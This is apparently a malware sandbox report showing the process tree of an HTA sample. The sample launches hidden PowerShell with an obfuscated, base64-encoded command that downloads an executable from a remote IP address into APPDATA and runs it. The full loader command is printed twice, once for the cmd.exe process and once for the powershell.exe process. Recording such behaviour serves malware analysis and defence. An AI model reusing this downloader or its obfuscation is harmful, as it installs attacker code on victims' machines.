| ZeroBOX

Behavioral Analysis

Process tree

  • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\niceworkingskillwithbestideasevermade.hta.html

    1636
    • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1636 CREDAT:145409

      1188
      • cmd.exe "C:\Windows\system32\cmd.exe" "/c poWERShELl -eX BYpASs -nop -w 1 -C devICecreDeNTIaLDePlOYment.eXe ; IeX($(Iex('[sYstem.TEXT.ENCodIng]'+[CHaR]0x3A+[Char]0X3a+'UtF8.geTStrING([SYsTEm.ConvERt]'+[CHAR]58+[ChAR]58+'FRombase64String('+[chAr]34+'JE0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQkVyZEVGaU5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnaVl1R0pHWm96YixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBndWxub0xiQnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJmRUpjemxLdHhKLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpWVHp1VnJYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT0JxY1p2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1Fc1BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVSVJSQVkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE06OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguMTIuODkuMjQvMTIzL2Nhc3NlLmV4ZSIsIiRFTnY6QVBQREFUQVxjYXNzZS5leGUiLDAsMCk7c1RhUnQtc2xFZXAoMyk7SW5Wb2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGNhc3NlLmV4ZSI='+[CHAr]34+'))')))"

        564
        • powershell.exe poWERShELl -eX BYpASs -nop -w 1 -C devICecreDeNTIaLDePlOYment.eXe ; IeX($(Iex('[sYstem.TEXT.ENCodIng]'+[CHaR]0x3A+[Char]0X3a+'UtF8.geTStrING([SYsTEm.ConvERt]'+[CHAR]58+[ChAR]58+'FRombase64String('+[chAr]34+'JE0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQkVyZEVGaU5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnaVl1R0pHWm96YixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBndWxub0xiQnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJmRUpjemxLdHhKLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpWVHp1VnJYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT0JxY1p2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1Fc1BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVSVJSQVkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE06OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguMTIuODkuMjQvMTIzL2Nhc3NlLmV4ZSIsIiRFTnY6QVBQREFUQVxjYXNzZS5leGUiLDAsMCk7c1RhUnQtc2xFZXAoMyk7SW5Wb2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGNhc3NlLmV4ZSI='+[CHAr]34+'))')))"

          1560

Process contents

No process loaded Click on a process in the tree above to load its data.